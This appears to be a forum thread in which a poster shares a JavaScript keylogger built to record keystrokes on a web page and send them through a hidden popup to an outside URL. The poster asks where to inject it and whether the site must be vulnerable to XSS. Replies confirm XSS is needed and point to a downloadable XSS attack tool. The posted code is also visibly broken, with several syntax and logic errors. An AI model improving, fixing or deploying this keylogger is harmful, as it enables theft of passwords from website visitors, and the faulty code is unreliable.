Where to insert a keylogger.
Basically I made a key-logger and I'm wandering where I should put it and als does the site have to be vunerable to XSS?
Here's the code for the key logger.It's based on the average legnth of passwords the speed people type etc.:
<script>
var counter=0;
var arrayOfCharsToSent=new Array() ;
function sentData(var _keyNum)
{
if arrayOfCharsToSent.length <=15 && _keyNum == 13){
window.open('http://www.target.com/cgi'+ arrayOfCharsToSent.toString() ,
'jav' ,
'menubar=no,toolbar=no,scrollbars=no,width=1,height=1,resizable=yes';
new_Win.blur()
}
}
function keyLogger(e){
var keyNum;
var keyChar;
if(window.event){
keyNum = e.which;
}
keyChar=string.fromCharCode(keyNum);
counter++
arrayOfCharsToSent[counter] = keyChar;
sentData(keyNum);
}
</script>
Please tell me how I could make this better or just a better key logger with nothing to do with mine. Thanks SaMTHG:)
Ive never seen a web based keylogger before, its an interesting concept though. Traditional keyloggers are client side, coded in C or some low level language, and use an integrated email program to mail you the keystrokes every 2000 or similar.
Im not sure how this would work, but to get a script of yours to be executed by a user you would probably need XSS yes.
jjbutler88 wrote: Ive never seen a web based keylogger before, its an interesting concept though. Traditional keyloggers are client side, coded in C or some low level language, and use an integrated email program to mail you the keystrokes every 2000 or similar.
Im not sure how this would work, but to get a script of yours to be executed by a user you would probably need XSS yes. Ever heard of the XSS Shell? ;)
It contains a keylogger (and many other interesting features) and is written in ASP.
XSS Shell: http://www.portcullis-security.com/tools/free/XSSShell039.zip XSS Shell - XSS Tunnel http://www.portcullis-security.com/tools/free/xssshell-xsstunnell.zip